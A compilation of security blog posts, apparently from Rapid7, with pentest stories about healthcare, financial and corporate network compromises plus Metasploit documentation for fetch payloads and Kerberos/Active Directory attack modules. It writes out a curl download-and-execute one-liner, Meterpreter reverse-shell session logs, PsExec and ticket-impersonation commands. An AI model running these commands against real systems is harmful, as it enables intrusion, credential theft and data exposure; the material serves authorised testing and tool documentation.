PenTales: Testing Security Health for a Healthcare Company

At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

Rapid7 was tasked with testing a provider website in the healthcare industry. Providers had the ability on the website to apply for jobs, manage time cards, connect with employers needing help at hospitals, apply for contracts, as well as manage certificates and documents that were needed to perform duties. The provider website was interested to see if their web application had any flaws that could be leveraged as an attacker, as the application was heavily customized.

I began by testing input fields for any vulnerabilities. If an input field does not sanitize user input correctly this could open the web application for potential attacks that allow an attacker to inject code. The vulnerable form with injected code could then be used to attack the web application or target users. An input field can be anything that allows you to enter information into the web application, like your name or email address. I discovered a field that was not correctly sanitizing input and when submitted, was viewed by accounts with administrative access.

Using the leverage gained from the vulnerable field I was able to perform a Cross Site Scripting (XSS) attack which stores JavaScript in a vulnerable form and returns the JavaScript to users. When a user views a vulnerable form with injected code, the code is executed inside the victim's browser. An XSS payload was created that, when viewed by users, sent a refresh token to a server under our control. This allowed us to collect administrative tokens for accounts that viewed the vulnerable form, resulting in account takeovers. I also discovered that the refresh token was misconfigured and allowed indefinite access to the web application once obtained. With said refresh token in hand I could log in to the account indefinitely even if the password was changed.

I then turned my attention to authorization issues on the web application. As a non-privileged user, I discovered a dashboard that allowed providers to view expiring documents. The request was vulnerable to Broken Object-Level Authorization and Insecure Direct Object Reference (IDOR). so I was able to manipulate the request to access streams of all uploaded documents for all end users with accounts on the web applications. These documents included all healthcare documents uploaded to the application including background checks, Social Security information, addresses, physician documents, and more.

Further analysis of the application showed that unprivileged users could access calls that were being utilized by administrative users. These calls disclosed sensitive information including usernames and passwords for vendors and staff associated with contracted hospitals on the application. As a non-privileged user account, I utilized this authorization issue in combination with an IDOR vulnerability to scrape usernames and passwords from the vulnerable endpoint for over 15,000 accounts in minutes.

Chasing a hunch that there would be more misconfigurations to exploit, I discovered that candidates for hospital positions at multiple locations had cleartext Social Security numbers stored in an administrative portion of the web application. An API endpoint was used to retrieve the information, and the endpoint was vulnerable to IDOR. I performed a brute force attack to retrieve names and cleartext Social Security numbers from hundreds of accounts being stored in the application.

This test highlighted some issues present in a large amount of web applications. We demonstrated just how quickly adversaries could exfiltrate sensitive data from an application that did not have safeguards in place. We also demonstrated just how important ensuring user input is sanitized correctly in an application and how failing to do so correctly can put users and the company at risk. Ensuring users are isolated and authorization is implemented appropriately is another major factor to consider when operating in the healthcare industry, as protecting client data is critical when dealing with protected health information and personally identifiable information.

The client was shocked at the results of testing the security of the application. The test disclosed some serious vulnerabilities that were not previously discovered by past testing from other security vendors, highlighting the importance of continuous testing especially for a customized application that was constantly evolving.

Check us out at this year's Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

Pentales: Old Vulns, New Tricks

At Rapid7 we love a good pentest story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

This engagement began like any other Internal Network Penetration test. I followed a systematic methodology to enumerate the internal domain. The target organization was a financial institution, but their internal domain was administered via Active Directory (AD) like most organizations with more than a handful of computers. AD is a Microsoft product that provides centralized control of the whole gamut of networking devices that an organization may have. This may include workstations, servers, switches, routers, printers, and IoT devices. Additionally, AD can be used for localized, global, or cloud-based networks.

After enumeration, I identified high value targets and a wide range of open ports and services. I used a Metasploit RC file containing instructions and settings to configure Metasploit modules. This allowed me to scan the open ports and services for common/default credentials, vulnerabilities, misconfigurations, software types, version numbers, and other accessible information in the background while I covered more ground manually.

I began operations to understand the state of several types of combinable networking vulnerabilities, checking for broadcast name services (BNS) and poisoning capabilities, Server Message Block (SMB) Signing statuses for hosts using SMB visible to my attack box (PTK), and for Internet Protocol version 6 (IPv6) traffic. These are some of the more common ways to begin a successful attack path. I checked all of these options on this organization’s network, but I found that I could not leverage BNS poisoning, SMB Signing not required, or IPv6-based attacks.

Luckily, the Metasploit RC file found default credentials for Intelligent Platform Management Interface (IPMI) assets. The IPMI protocol’s design introduced a vulnerability that provides a hash to someone attempting authentication. A user would attempt to authenticate with a specific username, and the IPMI device would provide the hash for that account. The Metasploit module for dumping IPMI hashes does this exactly for a wordlist full of common usernames and checks the provided hashes against a partial rainbow table of common passwords like “admin” and “root.” In this case, several devices were using credentials such as “admin:admin” and “root:root.”

This is exciting because IPMI is used to control servers, and more often these days server virtualization is such that several server virtual machines (VMs) are hosted on one physical server computer. I logged into the web interfaces associated with these IPMIs and found within the remote consoles that three of these IPMI assets were hosting VMware ESXi instances. VMware ESXi is, in fact, used to host and manage multiple VMs. The remote consoles provided the IP and website addresses for the VMware ESXi administrative login interfaces. I navigated to these interfaces and typed in the default credentials used on the IPMI hosts… and they were valid!

At this point, I was quite shocked that default credentials were in use, some 4+ decades after “admin:admin” became an official vulnerability. Not to mention, default credentials to valuable assets is probably the simplest and easiest vulnerability to exploit.

So, I got into the VMware ESXi consoles and I quickly identified which of the three assets contained the primary Domain Controller (DC) and Exchange Server. As an administrator to the VMware ESXi console, I had a lot of flexibility in what I was able to do with the virtual machines. First, I checked to see if there were sessions still open with these two assets. Both were locked and would require valid credentials to access via (Remote Desktop Protocol) RDP or similar remote access control.

I could conduct other attacks such as Denial of Service (DoS), deleting the machine or turning it off, but this would immediately be noticed by organization personnel, and most importantly these types of attacks were out of scope. DoS is out of scope for pentesters by default. This type of attack is extremely harmful to business operations, and has the potential to cause irreversible harm.

I needed to find an interface with which I had administrative control to view data on these VMs vs. trying to use the underlying Operating Systems (OS) within the VMs. I tried to download the VMs, but they would have taken 10 + days for the DC and multiple weeks for the Exchange Server. I tried to create a snapshot of the memory of the DC to attempt to filter credentials from it, but this was also too large and I could not acquire the file during the engagement.

I asked for help from the consulting team. At Rapid7, we have a deep bench of talented and knowledgeable people and a healthy culture of teamwork and support.

One of my teammates hopped on a call to help me investigate the potential options. Upon further review of the accessible ports and services in use by the VMware ESXi host, we found that Secure Shell (SSH) was open and accessible. There is a tool called SSHFS, which stands for SSH File System. This tool uses an SSH connection to mount and interact with the files on a remote device. This is similar to Network File Share (NFS) where a user can create a directory and mount it to the directory of a remote device. With administrative credentials to the VMware ESXi device, this provided me administrative control over the remote system’s file system and allowed me to interact with it in the same way as local files.

From here, I simply navigated to the directory within the DC that contained the NTDS.DIT file. This file is present on all Windows hosts, however, when it is contained by a Domain Controller this file contains all of the New Technology LAN Manager (NTLM) hashes for all of the accounts on the domain, including users, workstation machine accounts, and service accounts.

Sometimes, for environments that have or once had devices older than Windows Vista or Server 2008, there are also LM hashes which are incredibly weak. The entire keyspace for LM can be cracked in minutes to hours depending on the hardware, and the entire 8 character keyspace for NTLM can be cracked within several hours on enterprise-grade hardware.

This does not even cover the most valuable feature of NTLM authentication. NTLM hashes can be used as passwords, making it irrelevant to know the cleartext password that created the hash. This is called a “pass-the-hash” attack. Upon successfully dumping the NTDS.DIT file for the organization’s domain, I now controlled every domain-joined account and device.

With this control, I switched gears to post-exploitation and demonstrating impact for the organization's stakeholders. I logged into several email accounts, looking for and finding sensitive information such as Social Security Numbers (SSNs) and Account Numbers. I sent emails from organizational personnel’s email accounts to the point-of-contact and myself, demonstrating the impersonation potential. I used cracked account credentials to locate accounts for which Multi-factor Authentication (MFA) had not been configured and enrolled in MFA for one account. I perused several organization-wide network file share servers finding sensitive documents, PII, account numbers, bank and loan statements, and network information. I found multiple PDFs identifying the organization’s ATMs, their names, locations, makes and models, support information from supporting third-parties, and IP addresses.

I used these ATM IP addresses to conduct additional enumeration attempting to discover attack paths to gain control of ATMs. I found several open ports but was unable to gain access or control to the ATMs. However, within the directories containing ATM information were Excel spreadsheet logs of ATM activity. These non-password-protected spreadsheets held cardholder data, their links to bank customer account numbers, and historical information such as timestamps, locations, transaction amounts, and transaction types.

The customer’s environment had a lot of time and effort dedicated to security, and the security team covered many of the “low-hanging-fruit.” Sometimes older technology like IPMI is necessary for business. It is vital to understand the risks and to work with the technology we have to secure it against well-documented attacks. Why allow anyone internally to see an administrative resource? Access controls and closing unnecessary ports could minimize the attack surface on exploitable systems. Finally, one of the best defenses continues to be a strong, unique password for all logins, local or domain.

We, the pentesters at Rapid7 put our experience and knowledge together to reveal the weaknesses in the customer’s environment and give them the opportunities to fix them. Sometimes hacking is like finding a needle in the haystack, but we hackers have automated needle-finding, haystack-searching machines. Do your research, do the best you can, and when in doubt, get a pentest!

Check us out at this year's Black Hat USA in Las Vegas! Our experts will be giving talks and our booth will be staffed with many members of our team. Stop by and say hi.

PenTales: “User enumeration is not a vulnerability” – I beg to differ

At Rapid7 we love a good pentest story. So often they show the cleverness, skill, resilience, and dedication to our customer’s security that can only come from actively trying to break it! In this series, we’re going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization’s security.

This is a story of how a well defended network was compromised through user enumeration; a vulnerability which many organizations do not consider to be a “real” vulnerability. For the uninitiated, user enumeration vulnerabilities are application behaviors that could allow a malicious actor to determine valid usernames on a service. They are commonly exploited to set up follow-on attempts to guess users’ passwords.

I was tasked with performing an external penetration test for a midsize company. I began the engagement by performing port scanning and service enumeration, and discovered a small number of accessible web services. This led to a wonderful discovery: Outlook Web Access (OWA) was exposed! OWA suffers from a user enumeration vulnerability in which authentication requests involving valid usernames produce different responses than authentication requests involving invalid usernames. This could allow a malicious actor to submit unlimited authentication requests with different usernames, and use the responses to determine whether a given user exists in Exchange or not. We believe that Microsoft has been aware of this problem since 2014 but has not yet patched it. Some security professionals speculate that this may be because Microsoft (like many other companies) does not consider user enumeration to be a vulnerability.

I quickly began user enumeration against this service. After harvesting employee names from LinkedIn, marketing databases, and password breach databases, I coerced the employee names into a username format and verified them against OWA. Once done, I pulled popular names from US Census data and found additional valid usernames. When all was finished I was in possession of hundreds of usernames I could employ for password spray attacks set up through Metasploit. It took just one attempt to find success: a support engineer was using a classic weak password which is compliant with most password policies, [season][year][special character]!

I logged into this user’s email, enumerated their inbox, and found users sending support requests that contained passwords and sensitive information over plaintext! If a malicious actor were to obtain these, they could potentially log into other accounts owned by this company’s clients or employees given the prevalence of password reuse. I also extracted the Exchange Global Address List that contained every email address in the company which would prove incredibly useful for further password spray attacks (or in the hands of a malicious actor, for a business email compromise attack).

Finally, I observed that VMware Horizon, a system used to provide remote access to employee workstations, was accessible to the public internet. When attempting to log in using the compromised credentials it was discovered that multifactor authentication was not being employed. I identified an active Windows virtual machine and logged in over RDP, giving me a foothold in the client’s internal network. This entire attack chain took less than an hour and the ingress into internal systems went undetected by my client.

My client was stunned to say the least, but through our partnership we identified a set of controls which would mitigate all of the identified vulnerabilities. Our subsequent conversations also were able to surface other issues outside of the pentest scope which we helped address, and together we were able to dramatically reduce their organization’s attack surface.

We believe this assessment demonstrates the value of a penetration test: vulnerability scans will not flag findings such as OWA user enumeration, users employing weak passwords that still comply with password policies, and a lack of MFA. Through our penetration testing assessments, we can also demonstrate a more holistic picture of the risks that our clients face by identifying and chaining disparate vulnerabilities together in the way that only a skilled human can. We can then partner with them to ensure swift mitigation using a strategy that is tailor made for the client’s individual environment.

Fetch Payloads: A Shorter Path from Command Injection to Metasploit Session

Over the last year, two-thirds of the exploit modules added to Metasploit Framework have targeted command injection vulnerabilities (CWE-94: Improper Control of Generation of Code). In the process of helping new and existing open-source contributors learn how to use Metasploit’s command stager toolset, we’ve recognized that while they’re powerful, command stagers have a high learning curve.

So, we added a new type of payload to help contributors move as quickly as possible from vulnerability to module and users to have more control over the commands executed. We’re pleased to announce the availability of fetch payloads, which simplify and replace some of the command stager use cases, providing for faster, more intuitive command injection module development and offering a useful new on-the-fly hacking tool.

Fetch payloads are command-based payloads that leverage network-enabled commands (cURL, certutil, ftp, tftp, wget ) on remote targets to transfer and execute binary payloads quickly and easily. Previously, some of the functionality of fetch payloads could be accomplished within an exploit module by using command stagers, but fetch payloads give greater flexibility for staging payloads with network-based commands and allow command staging of payloads independently from Metasploit modules.

Command stagers are still the correct choice for staging payloads through commands that do not use networking, like echo or printf, but otherwise, we encourage you to check out fetch payloads when you write your next command injection module—or the next time you need to upload and execute a payload when you already have a shell on a target. You may have performed this manually in the past using Python’s built-in HTTP server, msfvenom, and Metasploit Framework. Now we do it all for you.

Fetch payloads have two core use cases: gaining a Metasploit session from a shell and embedded in command injection exploit modules. We explore both in more detail below.

Using Fetch Payloads Manually From A Shell

In this use case, we will upgrade a shell on a host (any shell, not just a Metasploit Framework shell) to a Metasploit session.

The shell session:

tmoose@ubuntu:~/rapid7/metasploit-framework$ nc -lv 4585
Listening on ubuntu 4585
Connection received on 64613
Microsoft Windows [Version 10.0.17134.1]
(c) 2018 Microsoft Corporation. All rights reserved.


Now, hop over to a Metasploit Framework instance reachable by that host and set up a fetch payload. You’ll need to decide five things:

The protocol you want to use (HTTP, HTTPS, and TFTP are currently supported)
The binary Metasploit payload you want to deliver
The command you want to use on the remote host to download the payload
The IP:PORT you want to use to serve the binary payload
The IP:PORT you want the binary payload to use

The first two items above determine the fetch payload we want to use: we are using cmd/windows/http/x64/meterpreter/reverse_tcp which will host a windows/x64/meterpreter/reverse_tcp binary payload on an HTTP server. We’re almost halfway done just by selecting the payload!

You can visualize the fetch payload names like this:

Command payload Platform Networking Protocol Underlying payload
cmd/ windows/ http/ x64/meterpreter/reverse_tcp

The other three values are set as options within the payload. We will use the default ports and leave the default command as the cURL command, so we just need to set LHOST for the payload to call back and FETCH_SRVHOST to tell the command where to call back and Framework where to host the payload:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      NdqujpmEtq       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST          yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port

View the full module info with the info, or info -d command.

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set LHOST

That’s it—no more setup unless you want to customize further. You can see that there are other options: FETCH_DELETE will attempt to delete the file after it executes, and the options FETCH_WRITABLE_DIR and FETCH_FILENAME will tell the fetch payload where to store the file on the remote host (in case there is a safe directory elsewhere that evades logging or antivirus. Users can also change the FETCH_URI value where the underlying payload is served, but the value is automatically generated based on the underlying payload: If a user creates a fetch payload in msfvenom and a listener in Framework, the default FETCH_URI values will match if the underlying payload is the same. Now, just like any payload, we can call generate or use msfvenom to create the command we need to execute on the remote host:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > generate -f raw

[*] Command to run on remote host: curl -so %TEMP%\NdqujpmEtq.exe & start /B %TEMP%\NdqujpmEtq.exe
curl -so %TEMP%\NdqujpmEtq.exe & start /B %TEMP%\NdqujpmEtq.exe

Also, the command appears when you start the handler:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > to_handler

[*] Command to run on remote host: curl -so %TEMP%\KphvDFGglOzp.exe & start /B %TEMP%\KphvDFGglOzp.exe
[*] Payload Handler Started as Job 0
[*] Fetch Handler listening on
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) >

For fetch payloads, to_handler does several things:

  • Creates the underlying payload in an executable format based on the platform selected; since we’re using Windows, the payload is created as an exe file.
  • Starts a server based on the protocol for the specific fetch payload selected
  • Adds the executable payload to the server
  • Creates a one-liner to download and execute the payload on target

All the user needs to do is copy/paste the command and hit enter:

C:\Users\msfuser\Downloads>curl -so %TEMP%\KphvDFGglOzp.exe & start /B %TEMP%\KphvDFGglOzp.exe

That will use cURL to download the payload and execute it:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > 
[*] Client requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to (curl/7.55.1)
[*] Sending stage (200774 bytes) to
[*] Meterpreter session 1 opened ( -> at 2023-05-18 12:39:12 -0500

Active sessions

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  DESKTOP-D1E425Q\msfuser @ DESKTOP-D1E425Q -> (

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > 

Using Fetch Payloads in a Metasploit Module

Module authors probably already see the utility in command injection modules. Framework’s command stagers are very powerful, but they also present a non-trivial barrier to entry for the user. Using fetch payloads in a Metasploit module is straightforward; authors will need to set the platform as linux or win and add the arch as ARCH_CMD. Then, when it comes time to get the command that must run on the remote target, simply invoke payload.encoded. Below is a bare-bones template of a module using fetch payloads against a Linux web server with a command injection vulnerability:

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
        'Name' => 'Module Name',
        'Description' => %q{ 1337 },
        'License' => MSF_LICENSE,
        'Author' => [ 'you' ],
        'References' => [],
        'Platform' => 'linux',
        'Arch' => 'ARCH_CMD',
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
          'RPORT' => 80,
          'FETCH_COMMAND' => 'WGET'
        'Targets' => [ [ 'Default', {} ] ],
        'DisclosureDate' => '2022-01-26',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
      ['TARGET_URI', [ false, 'URI', '/hackme'])

  def execute_command(cmd)
    # Whatever it takes to execute a cmd on target

  def check
    # Put your check method here

  def exploit

That’s it. With fetch payloads, Metasploit Framework will set up the server, make the executable payload, start the payload handler, serve the payload, handle the callback, and provide the command that needs to be executed; all you’ve got to do is tell it how to execute a command and then write a check method.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Attack simulation and penetration testing are both methods used to identify vulnerabilities in a company’s cybersecurity infrastructure, but there are some differences between the two.

Penetration testing, also known as pen testing, involves a team of cybersecurity professionals attempting to breach a company’s systems, networks, or applications using a variety of methods that a real-world attacker might use. The goal of pen testing is to identify vulnerabilities and assess the effectiveness of security controls, ultimately improving the security posture of the company.

Attack simulation, on the other hand, is a more comprehensive approach that involves simulating a range of real-world attack scenarios, including phishing attacks, malware infections, and social engineering attempts, to test a company’s defenses against a variety of threats. The focus is on understanding how an attacker might behave and respond in different scenarios, identifying potential weaknesses, and then addressing them.

Another difference between the two is that penetration testing is usually more targeted, focused on identifying specific vulnerabilities and testing particular areas of the system. In contrast, attack simulations are broader, more comprehensive, and often involve a wider range of techniques and attack vectors.

Overall, both methods are essential components of a comprehensive cybersecurity program, but they serve different purposes. Penetration testing is useful for identifying specific vulnerabilities that need to be addressed, while attack simulation helps to ensure that a company is prepared to defend against a wide range of potential threats.


The post Understanding the difference between attack simulation vs penetration testing appeared first on Cybersecurity Insiders.

Metasploit Framework 6.3 Released

The Metasploit team is pleased to announce the release of Metasploit Framework 6.3, which adds native support for Kerberos authentication, incorporates new modules to conduct a wide range of Active Directory attacks, and simplifies complex workflows to support faster and more intuitive security testing.


Kerberos is an authentication protocol that is commonly used to verify the identity of a user or a host in Windows environments. Kerberos support is built into most operating systems, but it’s best known as the authentication protocol used in Active Directory implementations. Thousands of organizations worldwide rely on Active Directory to define user groups and permissions and to provision network resources.

Kerberos and Active Directory more broadly have been prime attack targets for years and have featured prominently in both threat actor and pen tester playbooks. A fresh wave of Active Directory attacks proliferated in mid-2021, after researchers Will Schroeder and Lee Christensen published a technical whitepaper on a slew of novel attack techniques targeting Active Directory Certificate Services (AD CS). AD CS is a popular tool that allows administrators to implement public key infrastructure, and to issue and manage public key certificates. Abusing AD CS gave adversaries and red teams fresh opportunities to escalate privileges, move laterally, and establish persistence within Windows environments.

More than ever, first-class support for Active Directory and Kerberos-based attack techniques is critical to many pen testers and security researchers as they look to demonstrate risk to clients and the public. Plenty of new tooling has sprung up to facilitate offensive security operations in this space, but much of that tooling requires operators to manage their own tickets and environment variables, and/or is too narrowly scoped to support end-to-end attack workflows. As a result, many operators find themselves using multiple purpose-built tools to accomplish specific pieces of their playbooks, and then having to track ticket information manually to pursue broader objectives.

New in Metasploit 6.3

Metasploit Framework 6.3 streamlines Kerberos and Active Directory attack workflows by allowing users to authenticate to multiple services via Kerberos and build attack chains with new modules that request, forge, and convert tickets between formats for use in other tools. Tickets are cached and stored in the Metasploit database as loot, which removes the need for manual management of environment variables. Attack workflows support pivoting over sessions out of the box, as users expect from Metasploit.

Highlights include:

  • Native Kerberos authentication over HTTP, LDAP, MSSQL, SMB, and WinRM
  • The ability to request Ticket-Granting Tickets (TGT) and Ticket-Granting Server (TGS) from the Key Distribution Center (KDC) if the user obtains a password, NT hash, or encryption key; users can also request tickets via PKINIT with certificates issued from AD CS
  • Kerberos ticket inspection and debugging via the auxiliary/admin/kerberos/inspect_ticket module and the auxiliary/admin/kerberos/keytab module, which can generate Keytab files to allow decryption of Kerberos network traffic in Wireshark
  • Fully automated privilege escalation via Certifried (CVE-2022–26923)

See a graph of Metasploit authentication methods here.

MSF 6.3 also includes new modules for key attack primitives in Active Directory Domain Services (AD DS) environments, including creation of computer accounts, abuse of Role Based Constrained Delegation (RBCD), and enumeration of 28 key data points via LDAP. AD DS modules include:

In recent years, adversaries have frequently abused misconfigurations in AD CS to escalate privileges and maintain access to networks. Metasploit 6.3 adds new modules to find and execute certificate attacks, including:

Additional features and improvements since Metasploit 6.2 include:

  • A sixth getsystem technique that leverages the EFSRPC API to elevate a user with the SeImpersonatePrivilege permission to NT AUTHORITY\SYSTEM ("EfsPotato")
  • Better Linux credential extraction through native Mimipenguin support in Metasploit
  • Meterpreter support for running Cobalt Strike’s Beacon Object Files (BOF) — many thanks to the TrustedSec team!
  • A rewrite of Metasploit’s datastore to resolve common errors, address edge cases, and improve user quality of life
  • Updated show options support that lets module authors specify the conditions under which options are relevant to the user (e.g., a particular action or datastore value being set)

Example workflows

Below are some sample workflows for common actions supported in Metasploit 6.3. Additional workflows and context on Kerberos have been documented on the Metasploit docs site. This documentation is open-source, and contributions are welcome.

Kerberos Service Authentication

Opening a WinRM session:

msf6 > use auxiliary/scanner/winrm/winrm_login
msf6 auxiliary(scanner/winrm/winrm_login) > run rhost= username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost= winrm::rhostname=dc3.demo.local domain=demo.local

[+] - Received a valid TGT-Response
[*]   - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
[+] - Received a valid TGS-Response
[*]   - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin
[+] - Received a valid delegation TGS-Response
[+] - Received AP-REQ. Extracting session key...
[+] - Login Successful: demo.local\Administrator:p4$$w0rd
[*] Command shell session 1 opened ( -> at 2023-01-18 12:06:05 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
[*] Starting interaction with 1...

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.


Querying LDAP for accounts:

msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost= username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=
[*] Running module against

[+] - Received a valid TGT-Response
[*] - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin
[+] - Received a valid TGS-Response
[*] - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin
[+] - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] Discovered base DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local

 Name                Attributes
 ----                ----------
 badpwdcount         0
 pwdlastset          133184302034979121
 samaccountname      Administrator
 useraccountcontrol  512
 ... etc ...

Running PsExec against a host:

msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > run rhost= username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost= smb::rhostname=dc3.demo.local domain=demo.local

[*] Started reverse TCP handler on
[*] - Connecting to the server...
[*] - Authenticating to|demo.local as user 'Administrator'...
[+] - - Received a valid TGT-Response
[*] - - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
[+] - - Received a valid TGS-Response
[*] - - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
[+] - - Received a valid delegation TGS-Response
[*] - Selecting PowerShell target
[*] - Executing the payload...
[+] - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to
[*] Meterpreter session 6 opened ( -> at 2023-01-18 12:09:13 +0000

meterpreter >

Connecting to a Microsoft SQL Server instance and running a query:

msf6 > use auxiliary/admin/mssql/mssql_sql
msf6 auxiliary(admin/mssql/mssql_sql) > rerun domaincontrollerrhost= username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssql::domain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
[*] Reloading module...
[*] Running module against

[*] - - Valid TGT-Response
[+] - - Valid TGS-Response
[*] - - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin
[*] - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid
[*] - Row Count: 1 (Status: 16 Command: 193)


[*] Auxiliary module execution completed

Kerberos klist support

When running Metasploit with a database, all Kerberos tickets will be persisted into the database. The klist command can be used to view these persisted tickets. It is a top-level command and can be run even if a module is in use:

msf6 > klist
Kerberos Cache
host            principal               sname                              issued                     status       path
----            ---------               -----                              ------                     ------       ----  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL   2022-12-15 18:25:48 -0500  >>expired<<  /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_867855.bin  smcintyre@MSFLAB.LOCAL  cifs/DC.msflab.local@MSFLAB.LOCAL  2022-12-15 18:25:48 -0500  >>expired<<  /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_699376.bin  smcintyre@MSFLAB.LOCAL  krbtgt/msflab.local@MSFLAB.LOCAL   2022-12-16 14:51:50 -0500  valid        /home/smcintyre/.msf4/loot/20221216145149_default_192.168.159.10_mit.kerberos.cca_782487.bin  smcintyre@MSFLAB.LOCAL  cifs/DC.msflab.local@MSFLAB.LOCAL  2022-12-16 17:07:48 -0500  valid        /home/smcintyre/.msf4/loot/20221216170747_default_192.168.159.10_mit.kerberos.cca_156303.bin  smcintyre@MSFLAB.LOCAL  cifs/DC@MSFLAB.LOCAL               2022-12-16 17:08:26 -0500  valid        /home/smcintyre/.msf4/loot/20221216170825_default_192.168.159.10_mit.kerberos.cca_196712.bin  smcintyre@MSFLAB.LOCAL  krbtgt/msflab.local@MSFLAB.LOCAL   2022-12-16 15:03:03 -0500  valid        /home/smcintyre/.msf4/loot/20221216150302_default_192.168.159.10_mit.kerberos.cca_729805.bin  aliddle@MSFLAB.LOCAL    krbtgt/msflab.local@MSFLAB.LOCAL   2022-12-16 15:25:16 -0500  valid        /home/smcintyre/.msf4/loot/20221216152515_default_192.168.159.10_mit.kerberos.cca_934698.bin

The klist command also supports the -v flag for showing additional detail.

Requesting tickets

The auxiliary/admin/kerberos/get_ticket module can be used to request TGT/TGS tickets from the KDC. For instance the following example will request a TGS impersonating the Administrator account:

msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts= domain=mylab.local user=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
[*] Running module against

[*] - Getting TGS impersonating Administrator@mylab.local (SPN: cifs/dc02.mylab.local)
[+] - Received a valid TGT-Response
[*] - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
[+] - Received a valid TGS-Response
[+] - Received a valid TGS-Response
[*] - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
[*] Auxiliary module execution completed

The auxiliary/admin/kerberos/get_ticket module also supports authentication via PKINIT with the CERT_FILE and CERT_PASSWORD options. When used with the GET_HASH action, a user-to-user (U2U) authentication TGS will be requested, from which the NT hash can be calculated. This allows a user to obtain the NTLM hash for the account for which the certificate was issued.

msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts= cert_file=/home/smcintyre/.msf4/loot/
[*] Running module against

